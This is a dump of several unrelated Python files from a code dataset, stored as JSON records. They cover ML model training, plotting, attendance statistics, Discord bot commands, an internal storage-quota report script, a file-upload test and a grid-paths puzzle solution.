activation=activation))\n model.add(Dense(output_dim, activation=\"softmax\"))\n\n model.compile(\n loss='binary_crossentropy',\n optimizer=optimizer, metrics=['accuracy'])\n model.summary()\n return model\n\n\ndef create_nn_model():\n input_dim = 7\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = nn.Linear(input_dim, 270)\n self.fc2 = nn.Linear(270, 2)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.dropout(x, p=0.1)\n x = F.relu(x)\n x = self.fc2(x)\n x = F.softmax(x, dim=-1)\n return x\n\n return Net\n","sub_path":"sklearn_wrapper/modules/myfuncs/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565633110","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nTPdata1 = np.loadtxt('./1step/tp.txt')\nTPdata2 = np.loadtxt('./10step/tp.txt')\nTPdata3 = np.loadtxt('./100step/tp.txt')\n\n\nstep = TPdata1.shape[0]\nt = TPdata1[:, 0]\nT1 = TPdata1[:, 1]\nP1 = TPdata1[:, 3]\ntaverageT1 = TPdata1[:, 2]\ntaverageP1 = TPdata1[:, 4]\nT2 = TPdata2[:, 1]\nP2 = TPdata2[:, 3]\ntaverageT2 = TPdata2[:, 2]\ntaverageP2 = TPdata2[:, 4]\nT3 = TPdata3[:, 1]\nP3 = TPdata3[:, 3]\ntaverageT3 = TPdata3[:, 2]\ntaverageP3 = TPdata3[:, 4]\n\n\n################################ Temperature #################################\n\nplt.figure(figsize=(7, 5))\nplt.plot(t, taverageT1, label='1step')\nplt.plot(t, taverageT2, label='10step')\nplt.plot(t, taverageT3, label='100step')\nplt.xlim([0, 200])\n# plt.ylim([85, 115])\nplt.xlabel('Time')\nplt.ylabel('Temperature')\nplt.title('Time-averaged Temperature vs t')\nplt.legend(loc='lower right')\nplt.savefig('T&aT.png')\n\n\n################################ Temperature #################################\n\nplt.figure(figsize=(7, 5))\nplt.plot(t, taverageT1, label='1step')\nplt.plot(t, taverageT2, label='10step')\nplt.plot(t, taverageT3, label='100step')\nplt.xlim([0, 1])\nplt.ylim([80, 105])\nplt.xlabel('Time')\nplt.ylabel('Temperature')\nplt.title('Time-averaged Temperature vs t')\nplt.legend(loc='lower right')\nplt.savefig('T&aT_s.png')\n\n","sub_path":"Homework/Project/Velocity-rescaling/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205833851","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nimport json\nimport datetime\nfrom mpl_toolkits import mplot3d\nfrom datetime import datetime\n\n\n# this script groups attendance statuses and places them into one of three catergories\n# two graphs created showing attendance by day (incl. proportionalised)\n\n\nwith open('../../Datasets/Created:Modified/att_data_condensed.json', 'r') as fp:\n obj = json.load(fp)\n\n\ndf = pd.DataFrame(obj)\n\n\ndf.head(3)\n\n\npresent = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\nabsent = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\nother = {'Monday':0,'Tuesday':0,'Wednesday':0,'Thursday':0,'Friday':0,'Saturday':0,'Sunday':0}\n\n\nfor idx, x in enumerate(df['classDateTime']):\n tempDay = pd.Timestamp(x).day_name()\n tempStatus = df.loc[idx,'Status']\n if(tempStatus in ['P','PDG','PROJ','PRM']): \n present[tempDay] += 1\n elif(tempStatus in ['U','ABS','AA','PWR']): \n absent[tempDay] += 1\n else:\n other[tempDay] += 1\n \nprint(present)\n\n\nprint (present.get(\"Monday\",0))\n\n\n# y-axis in bold\nrc('font', weight='bold')\n \n# Values of each group\nbars1 = [present.get(\"Monday\",0),present.get(\"Tuesday\",0),present.get(\"Wednesday\",0),present.get(\"Thursday\",0),present.get(\"Friday\",0),present.get(\"Saturday\",0),present.get(\"Sunday\",0)]\nbars2 = [absent.get(\"Monday\",0),absent.get(\"Tuesday\",0),absent.get(\"Wednesday\",0),absent.get(\"Thursday\",0),absent.get(\"Friday\",0),absent.get(\"Saturday\",0),absent.get(\"Sunday\",0)]\nbars3 = [other.get(\"Monday\",0),other.get(\"Tuesday\",0),other.get(\"Wednesday\",0),other.get(\"Thursday\",0),other.get(\"Friday\",0),other.get(\"Saturday\",0),other.get(\"Sunday\",0)]\n\n# Heights of bars1 + bars2\nbars = np.add(bars1, bars2)\n \n# The position of the bars on the x-axis\nr = [0,1,2,3,4,5,6]\n \n# Names of group and bar width\nnames = ['Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday', 'Sunday']\n\nwidth = 10\nheight = 7\nplt.figure(figsize=(width, height))\n\nplt.bar(r, bars1,label=\"Present\")\nplt.bar(r, bars2, bottom=bars1,label=\"Absent\")\nplt.bar(r, bars3, bottom=bars,label=\"Other\")\n\n# Custom X axis\nplt.xticks(r, names, fontweight='bold')\nplt.xlabel(\"Week Day Attendance Status\")\nplt.legend()\n\n# Show graphic\nplt.show()\n\n\np = pd.DataFrame.from_dict(present,orient='index')\na = pd.DataFrame.from_dict(absent,orient='index')\no = pd.DataFrame.from_dict(other,orient='index')\n\n# Create the total score for each participant\ntotals = [i+j+k for i,j,k in zip(p[0], a[0], o[0])]\n\n# Create the percentage of the total score the pre_score value for each participant was\nbars1 = [i / j * 100 for i,j in zip(p[0], totals)]\n\n# Create the percentage of the total score the mid_score value for each participant was\nbars2 = [i / j * 100 for i,j in zip(a[0], totals)]\n\n# Create the percentage of the total score the post_score value for each participant was\nbars3 = [i / j * 100 for i,j in zip(o[0], totals)]\n\n\nrc('font', weight='bold')\n\n# Heights of bars1 + bars2\nbars = np.add(bars1, bars2)\n \n# The position of the bars on the x-axis\nr = [0,1,2,3,4,5,6]\n \n# Names of group and bar width\nnames = ['Monday','Tuesday','Wednesday','Thursday','Friday', 'Saturday', 'Sunday']\n\nwidth = 14\nheight = 10\nplt.figure(figsize=(width, height))\n\nplt.bar(r, bars1,label=\"Present\")\nplt.bar(r, bars2, bottom=bars1,label=\"Absent\")\nplt.bar(r, bars3, bottom=bars,label=\"Other\")\n\n# Custom X axis\nplt.xticks(r, names, fontweight='bold')\nplt.xlabel(\"Week Day Attendance Status\")\nplt.legend()\n\n# Show graphic\nplt.show()\n\n\ndf.head(5)\n\n\ntest = pd.DataFrame(df['Status'])\ntest2 = pd.DataFrame(df['classDateTime'])\n\n\n\ndf1 = pd.DataFrame(df, columns = ['Status', 'classDateTime'])\ndf1 = df1.sort_values('classDateTime')\ndf1 = df1.reset_index()\n\n\ndf1\n\n\n\nfor idx, x in enumerate(df1['classDateTime']):\n tempDay = pd.Timestamp(x).day_name()\n tempStatus = df.loc[idx,'Status']\n if(tempStatus in ['P','PDG','PROJ','PRM']): \n present[tempDay] += 1\n elif(tempStatus in ['U','ABS','AA','PWR']): \n absent[tempDay] += 1\n else:\n other[tempDay] += 1\n\n\nfor idx, x in enumerate(df1['classDateTime']):\n# print(x)\n date = datetime.strptime(x[0:8], '%d-%m-%y')\n print(date)\n\n\n\n\n\n\n","sub_path":"DailyAttendanceInsight.py","file_name":"DailyAttendanceInsight.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160411798","text":"import requests\n\n\nasync def run(client, message, args, prefix, db):\n if len(args) < 3:\n raise Exception(\"Bu komut tam olarak 3 argüman alır. Detaylar için !kullanım döviz\")\n\n para = float(args[0])\n orj = args[1].upper()\n dvz = args[2].upper()\n\n res = requests.get(f\"https://api.exchangeratesapi.io/latest?base={orj}\").json()\n\n if \"error\" in res:\n raise Exception(f\"Döviz çevrilirken bir hata oluştu, komut argümanlarını kontrol et. Detaylar için !kullanım döviz\")\n\n if dvz not in res[\"rates\"]:\n raise Exception(f\"İstenilen kur '{dvz}' bulunamadı\")\n\n else:\n await message.channel.send(f\"💸 `{para}` {orj} → `{para*res['rates'][dvz]}` {dvz}\")\n","sub_path":"commands/döviz.py","file_name":"döviz.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"94041066","text":"#!/usr/bin/env python3\n\nimport requests\nimport pandas\nimport stdiomask\n\n\ndef storageinfo():\n global URL\n env = input(\"Please select the env you want to query? [QA, Stage, or Prod]: \").upper()\n if env in ['QA', 'STAGE', 'PROD']:\n\n user = input(\"Please enter a \" + f'{env}' + \" username: \")\n password = stdiomask.getpass(prompt=\"Please enter \" + f'{env}' + ' password for user ' + f'{user}: ')\n\n if env == 'PROD':\n site = input('Please enter a site location to query [SJC, RTP-SAT, RTP-DR, GPK, BGL, NTN]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-wapl-localhost.com:6090'\n elif site == 'sjc':\n URL = f'http://{site}-wapl-localhost.com:6090'\n elif site == 'rtp-sat':\n site = 'rtp'\n URL = f'http://{site}-wapl-localhosts4.com:6090'\n elif site == 'ntn':\n URL = f'http://{site}-wapl-localhost2.com:6090'\n elif site == 'gpk' or site == 'bgl':\n URL = f'http://{site}-wapl-localhost3.com:6090'\n else:\n print('Please re-run script and select one of the following PROD sites [SJC, RTP-SAT, RTP-DR, GPK, BGL, NTN]')\n\n elif env == 'STAGE':\n site = input('Please enter a site location to query [SJC, RTP-DR, GPK]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-stg-localhost1.com:6090'\n elif site == 'sjc' or site == 'gpk':\n URL = f'http://{site}-stg-localhost1.com:6090'\n else:\n print('Please re-run script and select one of the following STAGE sites [SJC, RTP-DR, GPK,]')\n\n elif env == 'QA':\n site = input('Please enter a site location to query [SJC, RTP-DR,GPK]: ').lower()\n if site == 'rtp-dr':\n site = 'rtp'\n URL = f'http://{site}-qa-localhost1.com:6090'\n elif site == 'sjc' or site == 'gpk':\n URL = f'http://{site}-qa-localhost1.com:6090'\n else:\n print('Please re-run script and select one of the following QA sites [SJC, RTP-DR, GPK,]')\n else:\n print('Please re-run script and select one of the following env [QA, Stage, or Prod]')\n try:\n\n print(f'Querying API endpoint, please wait while I fetch the data.........')\n session = requests.Session()\n\n r = session.get(url=f'{URL}/localhost/api/storageinfo', auth=(user, password), timeout=None)\n\n if r.status_code != 200:\n print('Script failed due to the following status code ===>', r.status_code)\n exit(1)\n\n dataJson = r.json()\n data = dataJson['storageSummary']['repositoriesSummaryList']\n df = pandas.DataFrame(data=data)\n\n print(\n 'Done, Saving the file ' + f'localhost_{env}_{site.upper()}_Storage_Quota_report.csv' + ' to current working directory')\n df.to_csv(f'./localhost_{env}_{site.upper()}_Storage_Quota_report.csv', index=False)\n\n # catch all the exceptions\n except requests.exceptions.RequestException as e:\n print('ERROR: Request failed due to the following error =====>', e)\n\n else:\n print('Please only enter, [QA, Stage, or Prod]')\n\n\nstorageinfo()","sub_path":"storage_quota_report.py","file_name":"storage_quota_report.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584637178","text":"\nimport torch\nimport torch.nn.functional as F\n\nimport time\nimport math\nimport os\nfrom configparser import ConfigParser\nimport tqdm\nimport numpy as np\n\nfrom cnn4ie.dcnn.model import MultiLayerResDYCNN\nfrom dset.get_dataset import build_data_iter\nfrom cnn4ie.util.model_util import init_weights, epoch_time\nfrom cnn4ie.util import define_optimizer\nfrom cnn4ie.util import define_loss\nfrom cnn4ie.util import metrics, crf_util\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nclass Train():\n def __init__(self):\n pass\n\n def _define_model(self,\n input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n pretrained_embedding_vocab=None,\n init=True,\n use_crf=True):\n '''\n define model\n :param input_dim:\n :param output_dim\n :param emb_dim:\n :param hid_dim:\n :param cnn_layers:\n :param encoder_layers:\n :param kernel_size:\n :param dropout:\n :param use_crf:\n :param PAD_IDX\n :param pretrained_embedding_vocab\n :param init\n :return:\n '''\n model = MultiLayerResDYCNN(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n use_crf=use_crf)\n\n # init model weights\n if init:\n model.apply(init_weights)\n\n # init model token embedding\n if pretrained_embedding_vocab:\n model.tok_embedding.weight.data.copy_(pretrained_embedding_vocab.vectors)\n UNK_IDX = pretrained_embedding_vocab['']\n # pre-trained weights of the unk and pad word vectors are not trained on our dataset corpus, it is best to set them to zero\n model.tok_embedding.weight.data[UNK_IDX] = torch.zeros(emb_dim)\n model.tok_embedding.weight.data[PAD_IDX] = torch.zeros(emb_dim)\n\n return model.to(DEVICE)\n\n @staticmethod\n def load_model(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n model_path,\n use_crf=True):\n '''\n load model\n :param input_dim:\n :param output_dim\n :param emb_dim:\n :param hid_dim:\n :param cnn_layers:\n :param encoder_layers:\n :param kernel_size:\n :param dropout:\n :param PAD_IDX\n :param model_path\n :param use_crf\n :return:\n '''\n model = MultiLayerResDYCNN(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n use_crf=use_crf)\n # load model\n if os.path.exists(model_path):\n model.load_state_dict(torch.load(model_path, map_location=DEVICE))\n else:\n raise FileNotFoundError('Not found model file!')\n\n return model.to(DEVICE)\n\n def _train(self, model, train_iter, optimizer, criterion, clip):\n '''\n trainning module\n :param model:\n :param iterator:\n :param optimizer:\n :param criterion:\n :param clip:\n :return:\n '''\n model.train()\n epoch_loss = 0\n if model.use_crf:\n for batch in train_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n optimizer.zero_grad()\n\n loss = model.log_likelihood(source, target)\n\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n\n epoch_loss += loss.item()\n\n return epoch_loss / len(train_iter)\n\n else:\n for i, batch in enumerate(train_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n optimizer.zero_grad()\n\n out = model(source) # [batch_size, src_len, output_dim]\n out = out.view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n\n out = out.contiguous().view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n target = target.contiguous().view(-1) # [batch_size * src_len]\n\n # loss\n loss = criterion(out, target)\n\n loss.backward()\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n\n epoch_loss += loss.item()\n\n return epoch_loss / len(train_iter)\n\n def _validate(self, model, val_iter, criterion):\n '''\n validation module\n :param model:\n :param iterator:\n :param criterion:\n :return:\n '''\n model.eval()\n\n epoch_loss = 0\n if model.use_crf:\n with torch.no_grad():\n preds, labels = [], []\n for batch in val_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n\n # the length of non-zero true labels\n non_zero = []\n for i in target.cpu():\n tmp = []\n for j in i:\n if j.item() > 0:\n tmp.append(j.item())\n non_zero.append(tmp)\n\n for index, i in enumerate(out):\n preds += i[:len(non_zero[index])]\n\n for index, i in enumerate(target.tolist()):\n labels += i[:len(non_zero[index])]\n\n \n\n # loss\n loss = model.log_likelihood(source, target)\n\n epoch_loss += loss.item()\n # p,r,f1 metrics\n report = metrics.classification_report_f_r_f1(labels, preds)\n return epoch_loss / len(val_iter), report\n\n else:\n with torch.no_grad():\n labels = np.array([])\n predicts = np.array([])\n for batch in tqdm.tqdm(val_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n out = out.view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n\n out = out.contiguous().view(-1, out.shape[-1]) # [batch_size * src_len, output_dim]\n target = target.contiguous().view(-1) # [batch_size * src_len]\n\n # p,r,f1 metrics\n prediction = torch.max(F.softmax(out, dim=1), dim=1)[1]\n pred_y = prediction.cpu().data.numpy().squeeze()\n target_y = target.cpu().data.numpy()\n labels = np.append(labels, target_y)\n predicts = np.append(predicts, pred_y)\n\n # loss\n loss = criterion(out, target)\n\n epoch_loss += loss.item()\n report = metrics.classification_report_f_r_f1(labels, predicts)\n return epoch_loss / len(val_iter), report\n\n def _validate_2(self, model, val_iter, criterion, tags, tags_map):\n '''\n validation PER,ORG,LOC,T\n :param model:\n :param val_iter:\n :param criterion:\n :param tags\n :param tags_map\n :return:\n '''\n\n model.eval()\n\n epoch_loss = 0\n if model.use_crf:\n with torch.no_grad():\n for batch in val_iter:\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n print('\\treport:')\n for tag in tags:\n crf_util.f1_score(target, out, tag, tags_map)\n # loss\n loss = model.log_likelihood(source, target)\n epoch_loss += loss.item()\n return epoch_loss / len(val_iter)\n\n else:\n with torch.no_grad():\n for batch in tqdm.tqdm(val_iter):\n source, _ = batch.source\n target, _ = batch.target\n\n source = source.to(DEVICE)\n target = target.to(DEVICE)\n\n out = model(source) # [batch_size, src_len, output_dim]\n print('\\treport')\n for tag in tags:\n crf_util.f1_score(target, out, tag, tags_map)\n # loss\n loss = criterion(out, target)\n epoch_loss += loss.item()\n return epoch_loss / len(val_iter)\n\n def _train_val_main(self, model, optimizer, criterion, clip, n_epochs, train_iter, val_iter, model_path):\n '''\n trainning and validation\n :param model:\n :param optimizer:\n :param criterion:\n :param clip:\n :param n_epochs:\n :param train_iter:\n :param val_iter:\n :param model_path:\n :return:\n '''\n\n best_valid_loss = float('inf')\n # use crf\n if model.use_crf:\n for epoch in range(n_epochs):\n start_time = time.time()\n\n train_loss = self._train(model, train_iter, optimizer, criterion, clip)\n valid_loss, report = self._validate(model, val_iter, criterion)\n\n end_time = time.time()\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), model_path)\n\n try:\n train_ppl = math.exp(train_loss)\n except OverflowError:\n train_ppl = float('inf')\n\n try:\n val_ppl = math.exp(valid_loss)\n except OverflowError:\n val_ppl = float('inf')\n\n print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {train_ppl}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. PPL: {val_ppl}')\n print(f'\\t Val. report: {report}')\n\n else:\n for epoch in range(n_epochs):\n start_time = time.time()\n\n train_loss = self._train(model, train_iter, optimizer, criterion, clip)\n valid_loss, report = self._validate(model, val_iter, criterion)\n\n end_time = time.time()\n\n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n\n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), model_path)\n\n try:\n train_ppl = math.exp(train_loss)\n except OverflowError:\n train_ppl = float('inf')\n\n try:\n val_ppl = math.exp(valid_loss)\n except OverflowError:\n val_ppl = float('inf')\n\n print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train PPL: {train_ppl}')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. PPL: {val_ppl}')\n print(f'\\t Val. report: {report}')\n\n def train_model(self, config_path):\n if os.path.exists(config_path) and (os.path.split(config_path)[1].split('.')[0] == 'config') and (\n os.path.splitext(config_path)[1].split('.')[1] == 'cfg'):\n # load config file\n config = ConfigParser()\n config.read(config_path)\n section = config.sections()[0]\n\n # train and val file\n data_catalog = config.get(section, \"data_catalog\")\n # data_catalog = os.path.join(os.path.dirname(os.path.abspath('..')), data_catalog)\n train_file_name = config.get(section, \"train_file_name\")\n validation_file_name = config.get(section, \"validation_file_name\")\n\n # save vocabs of source, target, label\n source_vocab_path = config.get(section, \"source_vocab_path\")\n # source_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', source_vocab_path)\n\n target_vocab_path = config.get(section, \"target_vocab_path\")\n # target_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', target_vocab_path)\n\n label_vocab_path = config.get(section, \"label_vocab_path\")\n # label_vocab_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', label_vocab_path)\n\n pretrained_embedding_path = config.get(section, \"pretrained_embedding_path\")\n # pretrained_embedding_path = os.path.join(os.path.dirname(os.path.abspath('..')), 'data', pretrained_embedding_path)\n\n # model save/load path\n model_path = config.get(section, \"model_path\")\n # model_path = os.path.join(os.path.dirname(os.path.abspath('..')), \"model\", model_path)\n\n # model param config\n input_dim = config.getint(section, \"input_dim\")\n output_dim = config.getint(section, \"output_dim\")\n emb_dim = config.getint(section, \"emb_dim\")\n hid_dim = config.getint(section, \"hid_dim\")\n cnn_layers = config.getint(section, \"cnn_layers\")\n encoder_layers = config.getint(section, \"encoder_layers\")\n kernel_size = config.getint(section, \"kernel_size\")\n dropout = config.getfloat(section, \"dropout\")\n max_length = config.getint(section, \"max_length\")\n\n lr = config.getfloat(section, \"lr\")\n lr_decay = config.getfloat(section, 'lr_decay')\n weight_decay = config.getfloat(section, \"weight_decay\")\n gamma = config.getfloat(section, \"gamma\")\n momentum = config.getfloat(section, \"momentum\")\n eps = config.getfloat(section, \"eps\")\n batch_size = config.getint(section, \"batch_size\")\n clip = config.getfloat(section, \"clip\")\n n_epochs = config.getint(section, \"n_epochs\")\n\n optimizer_name = config.get(section, \"optimizer\")\n loss_name = config.get(section, \"loss\")\n\n pretrained_embedding_vocab = None\n # load pretrained embedding from file\n if os.path.exists(pretrained_embedding_path):\n # get train and val data, source_dict_size_embedding, target dict size, padding_idx\n train_iter, val_iter, pretrained_embedding_vocab, output_dim, PAD_IDX = build_data_iter(data_catalog,\n train_file_name,\n validation_file_name,\n source_vocab_path,\n target_vocab_path,\n label_vocab_path,\n batch_size,\n max_length,\n pretrained_embedding_path)\n input_dim = pretrained_embedding_vocab.vectors.shape[0]\n emb_dim = pretrained_embedding_vocab.vectors.shape[1]\n\n else:\n # get train and val data, source dict size, target dict size size, padding_idx\n train_iter, val_iter, input_dim, output_dim, PAD_IDX = build_data_iter(data_catalog,\n train_file_name,\n validation_file_name,\n source_vocab_path,\n target_vocab_path,\n label_vocab_path,\n batch_size,\n max_length)\n\n # define loss\n if loss_name == 'crf':\n criterion = None\n use_crf = True\n\n elif loss_name == 'ce':\n criterion = define_loss.define_loss_ce(PAD_IDX)\n use_crf = False\n\n elif loss_name == 'bce':\n criterion = define_loss.define_loss_bce()\n use_crf = False\n\n elif loss_name == 'bcelogits':\n criterion = define_loss.define_loss_bcelogits()\n use_crf = False\n\n else:\n raise NameError('No define loss function name!')\n\n print('input_dim:{}'.format(input_dim))\n print('emb_dim:{}'.format(emb_dim))\n\n # define model\n model = self._define_model(input_dim,\n output_dim,\n emb_dim,\n hid_dim,\n cnn_layers,\n encoder_layers,\n kernel_size,\n dropout,\n PAD_IDX,\n max_length,\n pretrained_embedding_vocab,\n True,\n use_crf)\n\n # define optimizer\n if optimizer_name == 'adam':\n optimizer = define_optimizer.define_optimizer_adam(model, lr=lr, weight_decay=weight_decay)\n\n elif optimizer_name == 'adamw':\n optimizer = define_optimizer.define_optimizer_adamw(model, lr=lr, weight_decay=weight_decay)\n\n elif optimizer_name == 'sgd':\n optimizer = define_optimizer.define_optimizer_sgd(model, lr=lr, momentum=momentum, weight_decay=weight_decay)\n\n elif optimizer_name == 'adagrad':\n optimizer = define_optimizer.define_optimizer_adagrad(model, lr=lr, lr_decay=lr_decay,\n weight_decay=weight_decay)\n\n elif optimizer_name == 'rmsprop':\n optimizer = define_optimizer.define_optimizer_rmsprop(model, lr=lr, weight_decay=weight_decay,\n momentum=momentum)\n\n elif optimizer_name == 'adadelta':\n optimizer = define_optimizer.define_optimizer_adadelta(model, lr=lr, weight_decay=weight_decay)\n\n else:\n raise NameError('No define optimization function name!')\n\n # train and validate\n self._train_val_main(model, optimizer, criterion, clip, n_epochs, train_iter, val_iter, model_path)\n\n else:\n raise FileNotFoundError('File config.cfg not found : ' + config_path)\n\nif __name__ == '__main__':\n config_path = os.path.join(os.getcwd(), 'config.cfg')\n train = Train()\n train.train_model(config_path)\n\n","sub_path":"cnn4ie/dcnn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":21449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329407860","text":"#!/user/bin/env python\n#coding:utf-8\n#Author:shenqiang\nimport requests\n\nclass filesHeader(object):\n '''文件传输头'''\n def fileHeader(self):\n sessionId = requests.Session\n headers = {'Accept':'application/json',\n 'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryNicLzxIDDIWaxMKM',\n 'Referer':'http://lyfadmin.edu.laiyifen.com/cms/h5-editor.html?platForm=2&pageId=1007099501000011&themeId=1&pageType=16&mode=1',\n 'Cookie':'ut=40279d073a3144ca84bef53a82c95cbb'\n }\n return sessionId,headers\n\n '''data数据'''\n def datas(self):\n data = {}\n return data\n\n '''file数据'''\n def files(self):\n file = {'Filedata':\n ('全渠道效果图.png',open('/Users/apple/Documents/罗马项目/营销域-主测试/全渠道效果图.png','rb'),'image/png',{})}\n return file\n\n\nclass upLoadFiles(filesHeader):\n\n def upLoadFilesPost(self):\n r = requests.post(url='http://lyfadmin.edu.laiyifen.com/cms/file/uploadFile.do', data=filesHeader.datas(),headers=filesHeader.fileHeader())\n # print(r)\n\n# if __name__ == '__main__':\n# upLoadFiles = upLoadFiles()\n# upLoadFiles.upLoadFilesPost()\n\n\n\n\n\n\n","sub_path":"tryApiTest/apiRequestTests/apiTests/execlFiles/TryUpLoadFile.py","file_name":"TryUpLoadFile.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151871937","text":"class Solution:\n def uniquePathsWithObstacles(self, obstacleGrid):\n \"\"\"\n :type obstacleGrid: List[List[int]]\n :rtype: int\n \"\"\"\n row = len(obstacleGrid)\n if row == 0 or obstacleGrid[0][0] == 1 or (row != 0 and len(obstacleGrid[0]) == 0):\n return 0\n column = len(obstacleGrid[0])\n dp = [[0 for _ in range(column)] for _ in range(row)]\n for i in range(row):\n for j in range(column):\n if obstacleGrid[i][j] == 1:\n dp[i][j] = 0\n elif i == 0 and j == 0:\n dp[i][j] = 1\n elif i == 0 and j > 0:\n dp[i][j] = dp[i][j-1]\n elif i > 0 and j == 0:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = dp[i][j-1] + dp[i-1][j]\n return dp[-1][-1]\n#2018.11.22\n#------------------main function-----------------\nif __name__ == '__main__':\n ls = [[0,0,0],[0,1,0],[0,0,0]]\n # ls = [[0,0],[1,1],[0,0]]\n # ls = [[0,0],[1,0]]\n # ls = [[0,0],[0,1]]\n # ls = [[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,0],[0,0,0,0,0]]\n s = Solution()\n nums = s.uniquePathsWithObstacles(ls)\n print(nums)","sub_path":"python_yxs/63.UniquePaths2.py","file_name":"63.UniquePaths2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167211323","text":"import io\nimport re\nimport textwrap\nfrom math import floor\n\nimport aiohttp\nimport discord\nfrom PIL import Image, ImageFont, ImageDraw\nfrom discord.ext import commands\n\nfrom cogs.utils.paginator import Pages\n\n\nasync def download(url):\n async with aiohttp.ClientSession() as sess:\n async with sess.get(url) as r:\n return io.BytesIO(await r.read())\n\n\nclass AvatarOrOnlineImage(commands.Converter):\n async def convert(self, ctx, argument):\n try:\n possible_member = await commands.MemberConverter() \\\n .convert(ctx, argument)\n url = possible_member.avatar_url_as(format='png')\n url = url.replace('gif', 'png').strip('<>')\n\n img = await download(url)\n\n img = Image.open(img)\n\n return img.convert('RGBA')\n except commands.BadArgument:\n pass\n\n # from https://stackoverflow.com/questions/169625/\n # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n # (Sorry about breaking the URL)\n\n # will add more image formats as time goes on\n regex = r'?'\n\n regex = re.compile(regex, re.IGNORECASE)\n\n if re.fullmatch(regex, argument):\n img = await download(argument.strip('<>'))\n\n img = Image.open(img)\n\n return img.convert('RGBA')\n else:\n # must be text\n return argument\n\n\n# The floor is good naming\nclass AvatarOrOnlineImageOrText(commands.Converter):\n async def convert(self, ctx, argument):\n try:\n possible_member = await commands.MemberConverter() \\\n .convert(ctx, argument)\n url = possible_member.avatar_url_as(format='png')\n url = url.replace('gif', 'png').strip('<>')\n\n img = await download(url)\n\n img = Image.open(img)\n\n return img.convert('RGBA'), possible_member.name\n except commands.BadArgument:\n pass\n\n # from https://stackoverflow.com/questions/169625/\n # regex-to-check-if-valid-url-that-ends-in-jpg-png-or-gif\n # (Sorry about breaking the URL)\n\n # will add more image formats as time 